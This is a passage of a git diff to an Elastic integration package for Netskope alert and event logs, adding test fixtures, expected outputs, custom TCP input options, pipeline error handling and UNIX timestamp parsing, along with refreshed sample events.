","slc_latitude":"13.0878400803"}},"user_agent":{"name":"Chrome","os":{"name":"Windows","version":"10.0"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Redmond","region_name":"Washington","postal_code":"98052","timezone":"America\/Los_Angeles"},"address":"81.2.69.142","ip":"81.2.69.142"},"file":{"size":13224532,"hash":{"md5":"5eb63bbbe01eeed093cb22bb8f5acdc3"}},"source":{"geo":{"country_iso_code":"IN","location":{"lat":null,"lon":null},"city_name":"Chennai","region_name":"Tamil Nadu","postal_code":"600004","timezone":"N\/A"},"address":"81.2.69.142","ip":"81.2.69.144"},"@timestamp":"2022-04-10T06:00:05.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} +{"event":{"id":"abcd19518cee24e"},"netskope":{"alerts":{"insertion_epoch_timestamp":1659940011,"access_method":"Client","acked":"false","action":"block","activity":{"name":"Upload","status":"Access Denied"},"is_alert":"yes","alert":{"id":"5312ab7ce55506bf055047551a5ecc55","name":"test_alert","type":"nspolicy"},"app":{"name":"test-app","category":"Collaboration","session":{"id":"1320712336"}},"category":{"name":"Collaboration"},"cci":"89","ccl":"excellent","count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"destination":{"geoip_src":1},"event":{"type":"sequence"},"event_source_channel":"application","managed":{"app":"yes"},"object":{"name":"TestResult.jpg","type":"File"},"organization":{"unit":"null"},"orig_ty":"nspolicy","other":{"categories":"['Cloud Storage']"},"page":{"url":"","site":"example..com"},"policy":{"name":"test-policy","actions":"['Upload']"},"profile":{"id":"test-profile"},"severity":{"level":"high"},"site":"example.com","source":{"geoip_src":2},"telemetry":{"app":"null"},"threshold":{"value":343},"traffic":{"type":"CloudApp"},"transaction":{"id":"78945610225424"},"type":"uba","url":"example.com\/abc\/test.txt","user":{"ip":"81.2.69.144"},"browser":{"session":{"id":"1232810986401"}},"last":{"app":"test-app","country":"US","device":"Device","location":"Columbus","region":"Ohio","timestamp":1650005},"slc_longitude":"80.2784729004","uba_ap1":"test_uba_ap12","uba_ap2":"test_uba_ap2","uba_inst1":"test_uba_inst1","uba_inst2":"test_uba_inst2","connection":{"id":"1234566742606078"},"instance":{"id":"5623027123"},"parent":{"id":"\/exammple\/test"},"referer":"https:\/\/ ","slc_latitude":"13.0878400803"}},"user_agent":{"name":"Chrome","os":{"name":"Windows","version":"10.0"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Redmond","region_name":"Washington","postal_code":"98052","timezone":"America\/Los_Angeles"},"address":"81.2.69.142","ip":"81.2.69.142"},"file":{"size":13224532,"hash":{"md5":"5eb63bbbe01eeed093cb22bb8f5acdc3"}},"source":{"geo":{"country_iso_code":"IN","location":{"lat":null,"lon":null},"city_name":"Chennai","region_name":"Tamil Nadu","postal_code":"600004","timezone":"N\/A"},"address":"81.2.69.142","ip":"81.2.69.144"},"@timestamp":"1649570405","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} diff --git a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json index 389d1167d31..e11012106be 100644 --- a/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json +++ b/packages/netskope/data_stream/alerts/_dev/test/pipeline/test-alerts.log-expected.json @@ -4398,6 +4398,207 @@ "version": "10.0" } } + }, + { + "@timestamp": "2022-04-10T06:00:05.000Z", + "destination": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "abcd19518cee24e", + "original": "{\"event\":{\"id\":\"abcd19518cee24e\"},\"netskope\":{\"alerts\":{\"insertion_epoch_timestamp\":1659940011,\"access_method\":\"Client\",\"acked\":\"false\",\"action\":\"block\",\"activity\":{\"name\":\"Upload\",\"status\":\"Access Denied\"},\"is_alert\":\"yes\",\"alert\":{\"id\":\"5312ab7ce55506bf055047551a5ecc55\",\"name\":\"test_alert\",\"type\":\"nspolicy\"},\"app\":{\"name\":\"test-app\",\"category\":\"Collaboration\",\"session\":{\"id\":\"1320712336\"}},\"category\":{\"name\":\"Collaboration\"},\"cci\":\"89\",\"ccl\":\"excellent\",\"count\":1,\"device\":{\"name\":\"Windows Device\",\"classification\":\"unmanaged\"},\"destination\":{\"geoip_src\":1},\"event\":{\"type\":\"sequence\"},\"event_source_channel\":\"application\",\"managed\":{\"app\":\"yes\"},\"object\":{\"name\":\"TestResult.jpg\",\"type\":\"File\"},\"organization\":{\"unit\":\"null\"},\"orig_ty\":\"nspolicy\",\"other\":{\"categories\":\"['Cloud Storage']\"},\"page\":{\"url\":\"\",\"site\":\"example..com\"},\"policy\":{\"name\":\"test-policy\",\"actions\":\"['Upload']\"},\"profile\":{\"id\":\"test-profile\"},\"severity\":{\"level\":\"high\"},\"site\":\"example.com\",\"source\":{\"geoip_src\":2},\"telemetry\":{\"app\":\"null\"},\"threshold\":{\"value\":343},\"traffic\":{\"type\":\"CloudApp\"},\"transaction\":{\"id\":\"78945610225424\"},\"type\":\"uba\",\"url\":\"example.com\\/abc\\/test.txt\",\"user\":{\"ip\":\"81.2.69.144\"},\"browser\":{\"session\":{\"id\":\"1232810986401\"}},\"last\":{\"app\":\"test-app\",\"country\":\"US\",\"device\":\"Device\",\"location\":\"Columbus\",\"region\":\"Ohio\",\"timestamp\":1650005},\"slc_longitude\":\"80.2784729004\",\"uba_ap1\":\"test_uba_ap12\",\"uba_ap2\":\"test_uba_ap2\",\"uba_inst1\":\"test_uba_inst1\",\"uba_inst2\":\"test_uba_inst2\",\"connection\":{\"id\":\"1234566742606078\"},\"instance\":{\"id\":\"5623027123\"},\"parent\":{\"id\":\"\\/exammple\\/test\"},\"referer\":\"https:\\/\\/ \",\"slc_latitude\":\"13.0878400803\"}},\"user_agent\":{\"name\":\"Chrome\",\"os\":{\"name\":\"Windows\",\"version\":\"10.0\"}},\"destination\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Redmond\",\"region_name\":\"Washington\",\"postal_code\":\"98052\",\"timezone\":\"America\\/Los_Angeles\"},\"address\":\"81.2.69.142\",\"ip\":\"81.2.69.142\"},\"file\":{\"size\":13224532,\"hash\":{\"md5\":\"5eb63bbbe01eeed093cb22bb8f5acdc3\"}},\"source\":{\"geo\":{\"country_iso_code\":\"IN\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Chennai\",\"region_name\":\"Tamil Nadu\",\"postal_code\":\"600004\",\"timezone\":\"N\\/A\"},\"address\":\"81.2.69.142\",\"ip\":\"81.2.69.144\"},\"@timestamp\":\"1649570405\",\"user\":{\"email\":{\"1\":\"user@example.com\",\"2\":\"user@example.com\"}}}" + }, + "file": { + "hash": { + "md5": "5eb63bbbe01eeed093cb22bb8f5acdc3" + }, + "size": 13224532 + }, + "netskope": { + "alerts": { + "access_method": "Client", + "acked": false, + "action": "block", + "activity": { + "name": "Upload", + "status": "Access Denied" + }, + "alert": { + "id": "5312ab7ce55506bf055047551a5ecc55", + "name": "test_alert", + "type": "nspolicy" + }, + "app": { + "category": "Collaboration", + "name": "test-app", + "session": { + "id": "1320712336" + } + }, + "browser": { + "session": { + "id": "1232810986401" + } + }, + "category": { + "name": "Collaboration" + }, + "cci": "89", + "ccl": "excellent", + "connection": { + "id": "1234566742606078" + }, + "count": 1, + "destination": { + "geoip_src": 1 + }, + "device": { + "classification": "unmanaged", + "name": "Windows Device" + }, + "event": { + "type": "sequence" + }, + "event_source_channel": "application", + "insertion_epoch_timestamp": 1659940011, + "instance": { + "id": "5623027123" + }, + "is_alert": true, + "last": { + "app": "test-app", + "country": "US", + "device": "Device", + "location": "Columbus", + "region": "Ohio", + "timestamp": 1650005 + }, + "managed": { + "app": true + }, + "object": { + "name": "TestResult.jpg", + "type": "File" + }, + "orig_ty": "nspolicy", + "other": { + "categories": "['Cloud Storage']" + }, + "page": { + "site": "example..com" + }, + "parent": { + "id": "/exammple/test" + }, + "policy": { + "actions": "['Upload']", + "name": "test-policy" + }, + "profile": { + "id": "test-profile" + }, + "referer": { + "original": "https:// ", + "scheme": "https" + }, + "severity": { + "level": "high" + }, + "site": "example.com", + "slc_latitude": "13.0878400803", + "slc_longitude": "80.2784729004", + "source": { + "geoip_src": 2 + }, + "threshold": { + "value": 343 + }, + "traffic": { + "type": "CloudApp" + }, + "transaction": { + "id": "78945610225424" + }, + "type": "uba", + "uba_ap1": "test_uba_ap12", + "uba_ap2": "test_uba_ap2", + "uba_inst1": "test_uba_inst1", + "uba_inst2": "test_uba_inst2", + "url": { + "extension": "txt", + "original": "example.com/abc/test.txt", + "path": "example.com/abc/test.txt" + }, + "user": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + } + } + }, + "related": { + "ip": [ + "81.2.69.142", + "81.2.69.144" + ] + }, + "source": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": [ + "user@example.com" + ] + }, + "user_agent": { + "name": "Chrome", + "os": { + "name": "Windows", + "version": "10.0" + } + } } ] } \ No newline at end of file diff --git a/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml b/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml index 551b76d32f4..bfb7a7a220c 100644 --- a/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml +++ b/packages/netskope/data_stream/alerts/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ vars: data_stream: vars: listen_port: 9020 +assert: + hit_count: 8 diff --git a/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs b/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs index bc587e50a3a..e22fd3aa545 100644 --- a/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs +++ b/packages/netskope/data_stream/alerts/agent/stream/tcp.yml.hbs @@ -12,6 +12,9 @@ publisher_pipeline.disable_host: true {{#if ssl}} ssl: {{ssl}} {{/if}} +{{#if tcp_options}} +{{tcp_options}} +{{/if}} {{#if processors}} processors: {{processors}} diff --git a/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml index e4fc349139d..f09b3ca4892 100644 --- a/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/netskope/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,15 @@ processors: - json: field: message add_to_root: true + tag: json_message add_to_root_conflict_strategy: replace + on_failure: + - append: + field: error.message + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' - rename: field: message target_field: event.original @@ -102,6 +110,7 @@ processors: if: ctx['@timestamp'] != null && ctx['@timestamp'] != '' formats: - ISO8601 + - UNIX on_failure: - set: field: '@timestamp' @@ -1305,8 +1314,8 @@ processors: if: ctx.user?.email != null lang: painless source: >- - def parts = ctx.user.email; if (parts != null && parts.size() > 0) { - + def parts = ctx.user.email; + if (!(parts instanceof String)) { List l = new ArrayList(); for (entry in parts.entrySet()) { diff --git a/packages/netskope/data_stream/alerts/manifest.yml b/packages/netskope/data_stream/alerts/manifest.yml index 73acd6e99cc..e5d3044a278 100644 --- a/packages/netskope/data_stream/alerts/manifest.yml +++ b/packages/netskope/data_stream/alerts/manifest.yml @@ -31,6 +31,18 @@ streams: type: bool multi: false default: false + - name: tcp_options + title: Custom TCP Options + type: yaml + description: Specify custom configuration options for the TCP input. See [TCP](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-tcp.html) for details. + required: false + show_user: false + multi: false + default: | + #max_message_size: 20MiB + #max_connections: 1 + #framing: delimiter + #line_delimiter: "\n" - name: processors type: yaml title: Processors diff --git a/packages/netskope/data_stream/alerts/sample_event.json b/packages/netskope/data_stream/alerts/sample_event.json index 61e53a626aa..6297e352893 100644 --- a/packages/netskope/data_stream/alerts/sample_event.json +++ b/packages/netskope/data_stream/alerts/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-12-23T16:27:09.000Z", "agent": { - "ephemeral_id": "f351413b-f36f-45a3-aa1f-1334e718f39a", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "275c19c7-0f2c-467b-850f-c153e4a77147", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.alerts", @@ -32,14 +32,14 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "id": "f621f259f5fbde850ad5593a", - "ingested": "2023-07-27T15:55:05Z" + "ingested": "2024-03-29T07:17:15Z" }, "file": { "hash": { @@ -56,7 +56,7 @@ }, "log": { "source": { - "address": "172.18.0.4:33326" + "address": "192.168.224.6:60788" } }, "netskope": { @@ -177,4 +177,4 @@ "name": "unknown" } } -} +} \ No newline at end of file diff --git a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log index 76c2d58f864..c042d9a099d 100644 --- a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log +++ b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log @@ -17,3 +17,5 @@ {"netskope":{"events":{"event_type":"application","insertion":{"timestamp":1655213123},"access_method":"API Connector","activity":{"name":"Download"},"alert":{"is_present":"yes"},"app":{"name":"null","activity":"DOWNLOAD","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"86","ccl":"high","count":1,"device":{"type":"Other"},"instance":{"id":"instance_test"},"object":{"name":"test.txt","id":"12357668","type":"File"},"organization_unit":"null","other":{"categories":"null"},"site":"null","source":{"geoip_src":2},"traffic":{"type":"CloudApp"},"type":"nspolicy","user":{"category":"Internal","ip":"81.2.69.144"}}},"event":{"id":"123f357a5241c6f"},"user":{"email":{"1":"Introspection","2":"user@example.com","3":"user@example.com","4":"user@example.com","5":"user@example.com"},"name":"null","roles":"unknown"},"user_agent":{"name":"unknown","os":{"name":"unknown"}},"source":{"geo":{"country_iso_code":"DE","location":{"lat":90,"lon":180},"city_name":"Frankfurt am Main","region_name":"Hesse","postal_code":"N\/A"},"address":"81.2.69.144","ip":"81.2.69.144"},"@timestamp":"2021-09-12T11:31:21.000Z"} {"netskope":{"events":{"event_type":"network","destination":{"geoip":{"source":1}},"insertion":{"timestamp":1612221062},"access_method":"Unknown","app":{"name":"unknown","category":"n\/a"},"category":{"name":"null"},"ccl":"unknown","count":1,"device":{"type":"Other"},"ip":{"protocol":"TCP"},"netskope_pop":"test_pop","numbytes":0,"organization_unit":"null","policy":{"name":"default"},"session":{"packets":0},"site":"unknown","total_packets":0,"traffic":{"type":"non-web"},"tunnel":{"id":"10"},"type":"network","source":{"geoip_src":2},"user":{"ip":"81.2.69.144"}}},"event":{"id":"123f2dc700386","action":"block"},"destination":{"geo":{"location":{"lat":0,"lon":0}},"domain":"example.com","address":"89.160.20.128","ip":"81.2.69.144","port":445},"client":{"bytes":0,"packets":0},"user_agent":{"os":{"name":"Windows 10.0"}},"server":{"bytes":0,"packets":0},"source":{"address":"89.160.20.128","ip":"89.160.20.128","port":49197,"geo":{"country_iso_code":"US","location":{"lat":-90.8234,"lon":-180.7257},"city_name":"Boardman","region_name":"Oregon","postal_code":"97818"}},"@timestamp":"2021-09-19T19:39:39.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1623222508},"access_method":"Client","app":{"name":"null","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"87","ccl":"high","connection":{"id":"0"},"count":1,"domain":"example.com","organization_unit":"null","page":"example.com\/page","site":"example.com","traffic":{"type":"CloudApp"},"type":"connection","user":{"generated":"no","ip":"89.160.20.112"},"url":"example.com","is_bypass_traffic":"no","transaction":{"id":"0"}}},"event":{"id":"123asd25fe48c2b3d"},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Tappahannock","region_name":"Virginia","timezone":"America\/New_York","postal_code":"22560"},"address":"89.160.20.112","ip":"89.160.20.112","port":443},"source":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Columbus","region_name":"Ohio","timezone":"America\/New_York","postal_code":"43215"},"address":"89.160.20.128","ip":"89.160.20.128"},"@timestamp":"2022-02-12T12:02:32.020Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} +{"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1623222508},"access_method":"Client","app":{"name":"null","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"87","ccl":"high","connection":{"id":"0"},"count":1,"domain":"example.com","organization_unit":"null","page":"example.com\/page","site":"example.com","traffic":{"type":"CloudApp"},"type":"connection","user":{"generated":"no","ip":"89.160.20.112"},"url":"example.com","is_bypass_traffic":"no","transaction":{"id":"0"}}},"event":{"id":"123asd25fe48c2b3d"},"destination":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Tappahannock","region_name":"Virginia","timezone":"America\/New_York","postal_code":"22560"},"address":"89.160.20.112","ip":"89.160.20.112","port":443},"source":{"geo":{"country_iso_code":"US","location":{"lat":null,"lon":null},"city_name":"Columbus","region_name":"Ohio","timezone":"America\/New_York","postal_code":"43215"},"address":"89.160.20.128","ip":"89.160.20.128"},"@timestamp":"1644667352","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} +{"event": {"id": "acac39573978cb1e8332da9c"}, "source": {"ip": "127.0.0.1", "geo": {"country_iso_code": "AU"}}, "destination": {"ip": "127.0.0.1", "geo": {"country_iso_code": "HK"}}, "user": {"email": "sandra.bourke@sunshinecoast.qld.gov.au"}, "@timestamp": "2024-03-14T04:28:19.000Z", "host": {"hostname": "C422093"}, "user_agent": {"device": {"name": "Windows Device"}, "os": {"name": "Windows 10"}, "name": "Edge"}} diff --git a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json index 6934061ff27..97c838956a5 100644 --- a/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json +++ b/packages/netskope/data_stream/events/_dev/test/pipeline/test-events.log-expected.json @@ -2178,6 +2178,164 @@ "user@example.com" ] } + }, + { + "@timestamp": "2022-02-12T12:02:32.000Z", + "destination": { + "address": "89.160.20.112", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "123asd25fe48c2b3d", + "original": "{\"netskope\":{\"events\":{\"event_type\":\"page\",\"insertion\":{\"timestamp\":1623222508},\"access_method\":\"Client\",\"app\":{\"name\":\"null\",\"category\":\"Cloud Storage\"},\"category\":{\"name\":\"Cloud Storage\"},\"cci\":\"87\",\"ccl\":\"high\",\"connection\":{\"id\":\"0\"},\"count\":1,\"domain\":\"example.com\",\"organization_unit\":\"null\",\"page\":\"example.com\\/page\",\"site\":\"example.com\",\"traffic\":{\"type\":\"CloudApp\"},\"type\":\"connection\",\"user\":{\"generated\":\"no\",\"ip\":\"89.160.20.112\"},\"url\":\"example.com\",\"is_bypass_traffic\":\"no\",\"transaction\":{\"id\":\"0\"}}},\"event\":{\"id\":\"123asd25fe48c2b3d\"},\"destination\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Tappahannock\",\"region_name\":\"Virginia\",\"timezone\":\"America\\/New_York\",\"postal_code\":\"22560\"},\"address\":\"89.160.20.112\",\"ip\":\"89.160.20.112\",\"port\":443},\"source\":{\"geo\":{\"country_iso_code\":\"US\",\"location\":{\"lat\":null,\"lon\":null},\"city_name\":\"Columbus\",\"region_name\":\"Ohio\",\"timezone\":\"America\\/New_York\",\"postal_code\":\"43215\"},\"address\":\"89.160.20.128\",\"ip\":\"89.160.20.128\"},\"@timestamp\":\"1644667352\",\"user\":{\"email\":{\"1\":\"user@example.com\",\"2\":\"user@example.com\",\"3\":\"user@example.com\"}}}" + }, + "netskope": { + "events": { + "access_method": "Client", + "app": { + "category": "Cloud Storage" + }, + "category": { + "name": "Cloud Storage" + }, + "cci": "87", + "ccl": "high", + "connection": { + "id": "0" + }, + "count": 1, + "domain": "example.com", + "event_type": "page", + "insertion": { + "timestamp": 1623222508 + }, + "is_bypass_traffic": false, + "page": "example.com/page", + "site": "example.com", + "traffic": { + "type": "CloudApp" + }, + "transaction": { + "id": "0" + }, + "type": "connection", + "url": { + "extension": "com", + "original": "example.com", + "path": "example.com" + }, + "user": { + "generated": false, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.112" + } + } + }, + "related": { + "ip": [ + "89.160.20.112", + "89.160.20.128" + ] + }, + "source": { + "address": "89.160.20.128", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.128" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": [ + "user@example.com" + ] + } + }, + { + "@timestamp": "2024-03-14T04:28:19.000Z", + "destination": { + "geo": { + "country_iso_code": "HK" + }, + "ip": "127.0.0.1" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "acac39573978cb1e8332da9c", + "original": "{\"event\": {\"id\": \"acac39573978cb1e8332da9c\"}, \"source\": {\"ip\": \"127.0.0.1\", \"geo\": {\"country_iso_code\": \"AU\"}}, \"destination\": {\"ip\": \"127.0.0.1\", \"geo\": {\"country_iso_code\": \"HK\"}}, \"user\": {\"email\": \"sandra.bourke@sunshinecoast.qld.gov.au\"}, \"@timestamp\": \"2024-03-14T04:28:19.000Z\", \"host\": {\"hostname\": \"C422093\"}, \"user_agent\": {\"device\": {\"name\": \"Windows Device\"}, \"os\": {\"name\": \"Windows 10\"}, \"name\": \"Edge\"}}" + }, + "host": { + "hostname": "C422093" + }, + "related": { + "hosts": [ + "C422093" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "geo": { + "country_iso_code": "AU" + }, + "ip": "127.0.0.1" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "sandra.bourke@sunshinecoast.qld.gov.au" + }, + "user_agent": { + "device": { + "name": "Windows Device" + }, + "name": "Edge", + "os": { + "name": "Windows 10" + } + } } ] } \ No newline at end of file diff --git a/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml b/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml index 851bba8f4c6..38eaaef0e85 100644 --- a/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml +++ b/packages/netskope/data_stream/events/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ vars: data_stream: vars: listen_port: 9021 +assert: + hit_count: 5 diff --git a/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs b/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs index bc587e50a3a..e22fd3aa545 100644 --- a/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs +++ b/packages/netskope/data_stream/events/agent/stream/tcp.yml.hbs @@ -12,6 +12,9 @@ publisher_pipeline.disable_host: true {{#if ssl}} ssl: {{ssl}} {{/if}} +{{#if tcp_options}} +{{tcp_options}} +{{/if}} {{#if processors}} processors: {{processors}} diff --git a/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 46cc53f5b6b..9fe79d17d0b 100644 --- a/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/netskope/data_stream/events/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,15 @@ processors: - json: field: message add_to_root: true + tag: json_message add_to_root_conflict_strategy: replace + on_failure: + - append: + field: error.message + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' - rename: field: message target_field: event.original @@ -126,6 +134,7 @@ processors: if: ctx['@timestamp'] != null && ctx['@timestamp'] != '' formats: - ISO8601 + - UNIX on_failure: - set: field: '@timestamp' @@ -1062,8 +1071,8 @@ processors: if: ctx.user?.email != null lang: painless source: >- - def parts = ctx.user.email; if (parts != null && parts.size() > 0) { - + def parts = ctx.user.email; + if (!(parts instanceof String)) { List l = new ArrayList(); for (entry in parts.entrySet()) { diff --git a/packages/netskope/data_stream/events/manifest.yml b/packages/netskope/data_stream/events/manifest.yml index c5186b4df73..d1c0c7da2ce 100644 --- a/packages/netskope/data_stream/events/manifest.yml +++ b/packages/netskope/data_stream/events/manifest.yml @@ -31,6 +31,18 @@ streams: type: bool multi: false default: false + - name: tcp_options + title: Custom TCP Options + type: yaml + description: Specify custom configuration options for the TCP input. See [TCP](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-tcp.html) for details. + required: false + show_user: false + multi: false + default: | + #max_message_size: 20MiB + #max_connections: 1 + #framing: delimiter + #line_delimiter: "\n" - name: processors type: yaml title: Processors diff --git a/packages/netskope/data_stream/events/sample_event.json b/packages/netskope/data_stream/events/sample_event.json index 258d1b5ea7a..ea327b4696c 100644 --- a/packages/netskope/data_stream/events/sample_event.json +++ b/packages/netskope/data_stream/events/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-12-24T00:29:56.000Z", "agent": { - "ephemeral_id": "169a2d34-f013-46a1-8cfa-0688afe7cb78", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "c286de6a-2b0b-406e-89e6-ee0d2b13bd2d", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.events", @@ -16,14 +16,14 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "dataset": "netskope.events", - "ingested": "2023-07-27T15:55:55Z" + "ingested": "2024-03-29T07:18:17Z" }, "event.id": "613ee55ec9d868fc47654a73", "input": { @@ -31,7 +31,7 @@ }, "log": { "source": { - "address": "172.18.0.4:53214" + "address": "192.168.224.6:57252" } }, "netskope": { @@ -56,4 +56,4 @@ "forwarded", "netskope-events" ] -} +} \ No newline at end of file diff --git a/packages/netskope/docs/README.md b/packages/netskope/docs/README.md index fd79073374b..58eba436dfa 100644 --- a/packages/netskope/docs/README.md +++ b/packages/netskope/docs/README.md @@ -583,11 +583,11 @@ An example event for `alerts` looks as following: { "@timestamp": "2021-12-23T16:27:09.000Z", "agent": { - "ephemeral_id": "f351413b-f36f-45a3-aa1f-1334e718f39a", - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "ephemeral_id": "275c19c7-0f2c-467b-850f-c153e4a77147", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.0.0" }, "data_stream": { "dataset": "netskope.alerts", @@ -614,14 +614,14 @@ An example event for `alerts` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "c0ee214c-57e5-4a60-80ba-e4dc247eb02e", + "id": "7b99f48c-6c10-4dad-86c4-ee578beef412", "snapshot": false, - "version": "8.9.0" + "version": "8.0.0" }, "event": { "agent_id_status": "verified", "id": "f621f259f5fbde850ad5593a", - "ingested": "2023-07-27T15:55:05Z" + "ingested": "2024-03-29T07:17:15Z" }, "file": { "hash": { @@ -638,7 +638,7 @@ An example event for `alerts` looks as following: }, "log": { "source": { - "address": "172.18.0.4:33326" + "address": "192.168.224.6:60788" } }, "netskope": { @@ -760,7 +760,6 @@ An example event for `alerts` looks as following: } } } - ``` ### Events @@ -1181,11 +1180,11 @@ An example event for `events` looks as following: { "@timestamp": "2021-12-24T00:29:56.000Z", "agent": { - "ephemeral_id": 